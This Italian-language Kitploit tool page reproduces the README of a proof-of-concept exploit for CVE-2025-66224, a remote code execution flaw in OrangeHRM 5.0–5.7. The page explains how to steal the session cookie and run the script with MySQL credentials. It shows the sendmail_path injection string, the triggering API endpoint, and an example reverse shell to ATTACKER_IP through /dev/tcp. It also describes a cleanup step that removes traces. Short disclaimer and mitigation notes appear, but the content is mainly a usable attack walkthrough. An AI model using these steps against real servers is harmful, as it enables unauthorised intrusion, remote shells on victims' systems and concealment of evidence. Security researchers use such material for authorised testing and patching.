Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PoC-CVE-2025-66224 — Exploit proof-of-concept per CVE-2025-66224 che dimostra l'esecuzione remota di codice in OrangeHRM tramite iniezione di comandi nel parametro sendmail_path, con iniezione automatizzata del payload nel database e pulizia. | Kitploit
Strumenti/GitHubGitHub/richard-natan/poc-cve-2025-66224
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneSicurezza dei Database
GitHubrichard-natan/poc-cve-2025-66224

PoC-CVE-2025-66224

Exploit proof-of-concept per CVE-2025-66224 che dimostra l'esecuzione remota di codice in OrangeHRM tramite iniezione di comandi nel parametro sendmail_path, con iniezione automatizzata del payload nel database e pulizia.

Vedi Repository
238 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

OrangeHRM RCE Exploit - CVE-2025-66224

📋 Descrizione

Questa Proof of Concept (PoC) dimostra una vulnerabilità di Remote Code Execution (RCE) in OrangeHRM tramite command injection nel parametro di configurazione sendmail_path.

L'exploit funziona in questo modo:

  1. Inietta un payload dannoso nel database MySQL (tabella hs_hr_config)
  2. Attiva l'esecuzione del payload tramite l'endpoint API di configurazione email
  3. Ripristina automaticamente il valore originale per eliminare le tracce

🎯 Versioni Interessate

  • OrangeHRM versione 5.0 fino alla 5.7

⚠️ Disclaimer

Questo strumento è fornito solo per scopi didattici e test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Gli autori non sono responsabili per eventuali usi impropri o danni causati da questo strumento.

🔧 Requisiti

root@kitploit:~
pip install requests mysql-connector-python

📦 Installazione

root@kitploit:~
git clone https://github.com/richard-natan/PoC-CVE-2025-66224
cd PoC-CVE-2025-66224
pip install -r requirements.txt

🚀 Utilizzo

Passo 1: Ottenere il Cookie di Sessione

  1. Accedi a OrangeHRM tramite l'interfaccia web
  2. Apri gli Strumenti di Sviluppo del browser (F12)
  3. Naviga su Storage > Cookies (Firefox) oppure Application > Cookies (Chrome)
  4. Copia il valore del cookie _orangehrm

Passo 2: Eseguire l'Exploit

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -c <COOKIE_VALUE> \
    -dh <MYSQL_HOST> -du <MYSQL_USER> -dp <MYSQL_PASSWORD> \
    -cmd '<COMMAND_TO_EXECUTE>'

Esempio - Comando Semplice

root@kitploit:~
python3 exploit.py -t http://127.0.0.1:8080/ \
    -c "g58tak8pbnheseatv6dggvi31i" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd "touch /tmp/pwned"

Esempio - Reverse Shell

root@kitploit:~
# Avvia il listener sulla macchina dell'attaccante
nc -lvnp 4444

# Esegui l'exploit con il payload reverse shell
python3 exploit.py -t http://target.com/ \
    -c "your_session_cookie" \
    -dh 172.18.0.2 \
    -du orange_user \
    -dp orange_password \
    -cmd 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'

📝 Parametri

ParametroShortObbligatorioDescrizione
--target-t✅URL del target (es., http://target.com)
--cookie-c✅Valore del cookie di sessione
--cookie_name-cn❌Nome del cookie (predefinito: _orangehrm)
--command-cmd✅Comando da eseguire sul target
--db_host-dh✅Indirizzo host MySQL
--db_user-du✅Nome utente MySQL
--db_pass-dp✅Password MySQL
--db_port-dport❌Porta MySQL (predefinita: 3306)

🔍 Come Funziona

Dettagli della Vulnerabilità

La vulnerabilità risiede nella funzionalità di configurazione email, dove il parametro sendmail_path viene salvato nel database e successivamente eseguito senza una corretta sanificazione.

Flusso dello Sfruttamento:

root@kitploit:~
1. Autenticazione a OrangeHRM (ottenere un cookie di sessione valido)
   ↓
2. Connessione al database MySQL
   ↓
3. Individuazione della tabella hs_hr_config
   ↓
4. Aggiornamento del valore email_config.sendmail_path:
   DA: /usr/sbin/sendmail -bs
   A:   /usr/sbin/sendmail -bs && <PAYLOAD> #
   ↓
5. Attivazione dell'esecuzione tramite API:
   PUT /web/index.php/api/v2/admin/email-configuration
   ↓
6. Il comando viene eseguito sul server
   ↓
7. Ripristino del valore originale (pulizia)

Dettagli Tecnici

Parametro Vulnerabile: email_config.sendmail_path

Database:

  • Tabella: hs_hr_config
  • Colonna: name = 'email_config.sendmail_path'
  • Colonna: value = percorso del comando sendmail

Endpoint di Attivazione:

root@kitploit:~
PUT /web/index.php/api/v2/admin/email-configuration

🛡️ Mitigazione

  1. Validazione degli Input: Implementare una validazione rigorosa per il parametro sendmail_path
  2. Escaping: Eseguire un corretto escaping dei comandi shell prima dell'esecuzione
  3. Minimo Privilegio: Eseguire il server web con privilegi minimi
  4. Aggiornamento: Applicare le ultime patch di sicurezza per OrangeHRM

🤝 Crediti

PoC di: RiccK

Team: Bypassadores && HackersOnSteroids

🔗 Riferimenti

  • CVE-2025-66224

⚠️ Usa responsabilmente. Ottieni sempre la dovuta autorizzazione prima di effettuare test.

Scarica lo strumento